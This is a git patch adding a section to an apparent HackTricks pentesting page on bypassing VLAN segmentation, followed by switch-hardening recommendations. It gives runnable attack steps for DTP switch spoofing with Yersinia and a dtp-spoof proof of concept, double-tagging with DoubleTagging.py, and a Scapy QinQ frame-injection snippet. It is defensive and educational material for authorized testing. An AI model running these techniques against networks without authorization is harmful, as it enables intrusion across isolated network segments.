From 458cba19c0b72f30a0f63dd97e1a268bc50adf16 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 18 Jul 2025 01:42:10 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/generic-methodologies-and-reso... --- .../lateral-vlan-segmentation-bypass.md | 79 ++++++++++++++++++- 1 file changed, 76 insertions(+), 3 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index d380863a2..5ebe43473 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -60,11 +60,84 @@ Connectivity is tested by initiating ICMP requests to the default gateways for V Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions. +--- + +## Other VLAN-Hopping Techniques (no privileged switch CLI) + +The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a **regular access port**. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS: + +### 1. Switch-Spoofing with Dynamic Trunking Protocol (DTP) + +Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single **DTP “desirable”** or **“trunk”** frame converts the access port into an 802.1Q trunk that carries *all* allowed VLANs. + +*Yersinia* and several PoCs automate the process: + +```bash +# Become a trunk using Yersinia (GUI) +$ sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking + +# Python PoC (dtp-spoof) +$ git clone https://github.com/fleetcaptain/dtp-spoof.git +$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable +``` + +Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*: + +```bash +sudo modprobe 8021q +sudo ip link add link eth0 name eth0.30 type vlan id 30 +sudo ip addr add 10.10.30.66/24 dev eth0.30 +sudo ip link set eth0.30 up +``` + +### 2. Double-Tagging (Native-VLAN Abuse) + +If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection: + +```bash +python3 DoubleTagging.py \ + --interface eth0 \ + --nativevlan 1 \ + --targetvlan 20 \ + --victim 10.10.20.24 \ + --attacker 10.10.1.54 +``` + +Packet walk-through: +1. Outer tag (1) is stripped by the first switch because it matches the native VLAN. +2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20. + +The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames . + +### 3. QinQ (802.1ad) Stacking + +Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy: + +```python +from scapy.all import * +outer = 100 # Service tag +inner = 30 # Customer / target VLAN +payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP() +frame = Dot1Q(type=0x88a8, vlan=outer)/payload +sendp(frame, iface="eth0") +``` + +--- + +## Defensive Recommendations + +1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`. +2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`. +3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`. +4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity. +5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation. + +--- + ## References - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) +- VLANPWN attack toolkit – +- Twingate "What is VLAN Hopping?" (Aug 2024) – {{#include ../../banners/hacktricks-training.md}} - - -